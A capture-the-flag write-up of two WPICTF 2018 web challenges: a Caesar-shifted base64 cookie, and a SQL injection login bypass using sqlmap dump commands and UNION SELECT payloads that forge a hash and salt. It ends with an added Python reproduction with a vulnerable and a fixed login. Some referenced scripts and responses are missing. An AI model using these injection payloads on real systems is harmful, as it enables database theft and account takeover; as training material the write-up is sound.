# Information

## Version

| By | Version | Comment |
|---|---|---|
| noraj | 1.0 | Creation |
## CTF
- Name : WPICTF 2018
- Website : wpictf.xyz
- Type : Online
- Format : Jeopardy
- CTF Time : link
## 150 - Dance - Web

by binam

TL;DR: intercepting proxy, base64 `flag` cookie, Caesar bruteforce
The URL uses an HTTP 302 to redirect us to the Rick Astley - Never Gonna Give You Up YouTube video.

Making the request with Burp Suite Repeater,

```http
GET / HTTP/1.1
```

we obtain the following result:

```http
HTTP/1.1 302 FOUND
```
The value of the `flag` cookie is a base64 string but gives us nothing when we decode it. The second cookie, `Julius C.`, lets us think this is about the Caesar cipher.

By doing a Caesar bruteforce, we can get the following base64 string with a +17 shift: `V1BJe2JJbkFtX2RvM3NuLHRfa24wd19oMXdfdDJfY3JlYVRlX2NoYUlJZW5nZXN9DQo=`.
Here was my Ruby script to do some case-sensitive Caesar bruteforce:
Then, we can decode the flag:

```shell
$ printf %s 'V1BJe2JJbkFtX2RvM3NuLHRfa24wd19oMXdfdDJfY3JlYVRlX2NoYUlJZW5nZXN9DQo=' | base64 -d
```
## 200 - Vault - Web

by GODeva

In the source of `index.html` we can read the following HTML comment:

```html
<!-- Welcome to the the Fuller Vault
```
So I guess that we need to find a SQL injection to dump the database.

By inserting a single quote in the `clientname` field of the form we get an error:

```python
File /home/vault/vault/secretvault.py, line 58, in login
    connection = sqlite3.connect(os.path.join(directoryFordata, 'clients.db'))
```
So now we know there is a Python backend running Flask and we know the SQL query used.

This payload `Goutham' OR '1'='1-- -` confirms the SQL injection, and this one `Goutham' AND 1=randomblob(1000000000)-- -` confirms it again.

So I read the SQLmap wiki to build a useful SQLmap command:

```shell
$ sqlmap -u https://vault.wpictf.xyz/login --method=POST --data='clientname=Goutham&password=b' -p clientname --dbms SQLite --random-agent -T clients -C clientname,hash,salt --dump --risk 3
```
So we obtain the following data from the database:

| id | clientname | hash | salt |
|---|---|---|---|
| 1 | Gaines | ae6b2b347fd948b39a126e71decfc1cc411925a1ddc9f995949517d983fb027b | leoczve |
| 2 | Goutham | 6bad0bd9907898e3c7d6b2139241ac7591a4556b2f9fbc41ed15a31e6d2df738 | nepdrqs |
| 3 | Binam | 49d790f22b2248638bf56f8a573c8e95eac2ed2f63a8f8eef97972d1b2d77bb7 | cseerlb |
The hash used seems to be SHA-256:

```shell
$ hashid 49d790f22b2248638bf56f8a573c8e95eac2ed2f63a8f8eef97972d1b2d77bb7
```

I tried to bruteforce them with my Ruby script:
But I didn't get anything.
An admin gave me a hint: *The goal is to trick the database when checking for a hash.* And they said on the Discord channel that bruteforce is not needed.

Note: I did this part after the end of the CTF.

Ok, let's think this time before using force.

We know there are 3 columns in the query, so let's try this: `invalid' UNION SELECT 1,1,1-- -`.

We get a useful error again:
```python
res = pointer.fetchone()
```
As we can't break Goutham's password, we may use `UNION` to provide another row with the hash we want; using a comment `--` will allow us to bypass `LIMIT 1`. This way we will be able to provide arbitrary stuff in order to trick `hashlib.sha256(password + salt)`.

Knowing the database and the hashing scheme, we can compute a new hash and force the server to use it:

```shell
$ printf %s%s 'rawsec' 'nepdrqs' | sha256sum
```

- clientname: `invalid' UNION SELECT "2", "9c1e78c30e9721805b44701a05476086312741b6114334e3c312b87da7f95e4a", "nepdrqs"--`
- password: `rawsec`
Without knowing the database content but knowing the hash scheme, it is easy too: we can pick the id from the database and also overwrite the salt:

```shell
$ printf %s%s 'rawsec' 'noraj' | sha256sum
```

- clientname: `invalid' UNION SELECT id, "4541356add1076a04e4a340b7cb573c9533fc025b0b9af7be0203af216eaa13e", "noraj" FROM clients WHERE clientname = "Goutham"--`
- password: `rawsec`
But for those who didn't discover the hash scheme from the second error message, it is also possible to provide an empty string as the salt, so a prefixed or suffixed salt will have the same behaviour:

```shell
$ printf %s%s 'rawsec' '' | sha256sum
```

- clientname: `invalid' UNION SELECT id, "fc924c26cc88170d40d708e7eaf654b6dc6d1fb8b17bea1510eca639511833a1", "" FROM clients WHERE clientname = "Goutham"--`
- password: `rawsec`
Why Goutham? Because the comment on the page suggests it.
So we get the flag: `Welcome back valid user! Your digital secret is: "WPI{y0ur_fl46_h45_l1k3ly_b31n6_c0mpr0m153d}"`.
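The `UNION` trick described above, as an added example that is not part of the original write-up or the challenge's code: a toy reproduction of the login check against an in-memory SQLite `clients` table, where the string-formatted query shape, the made-up passwords and the parameterised `hmac.compare_digest` fix are assumptions. It shows the injected row passing the vulnerable check and failing the fixed one.

```python
import hashlib
import hmac
import sqlite3

# Constructed test data: the salts are the ones from the dump above, the
# passwords are made up here since the real ones were never recovered.
CLIENTS = [("Gaines", "leoczve"), ("Goutham", "nepdrqs"), ("Binam", "cseerlb")]
PASSWORDS = {name: "made-up-" + name for name, _ in CLIENTS}

def client_hash(password, salt):
    # Hashing scheme leaked by the error trace: sha256(password + salt)
    return hashlib.sha256((password + salt).encode()).hexdigest()

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE clients (id INTEGER PRIMARY KEY, clientname TEXT, hash TEXT, salt TEXT)")
    for i, (name, salt) in enumerate(CLIENTS, start=1):
        db.execute("INSERT INTO clients VALUES (?, ?, ?, ?)",
                   (i, name, client_hash(PASSWORDS[name], salt), salt))
    return db

def login_vulnerable(db, clientname, password):
    # Assumed shape of the challenge's query: built by string formatting, so the
    # clientname can append a UNION and comment out the trailing LIMIT 1.
    sql = f"SELECT id, hash, salt FROM clients WHERE clientname = '{clientname}' LIMIT 1"
    row = db.execute(sql).fetchone()
    if row is None:
        return False
    _, stored_hash, salt = row
    return client_hash(password, salt) == stored_hash

def login_fixed(db, clientname, password):
    # Parameterised query: the input is data, never SQL, and the digest
    # comparison is constant time.
    row = db.execute("SELECT id, hash, salt FROM clients WHERE clientname = ? LIMIT 1",
                     (clientname,)).fetchone()
    if row is None:
        return False
    _, stored_hash, salt = row
    return hmac.compare_digest(client_hash(password, salt), stored_hash)

def union_payload(password, salt):
    # Attacker-chosen row, mirroring the write-up's second payload but with
    # single-quoted literals so it does not rely on SQLite's double-quote quirk.
    return ("invalid' UNION SELECT id, '" + client_hash(password, salt) + "', '"
            + salt + "' FROM clients WHERE clientname = 'Goutham'--")
```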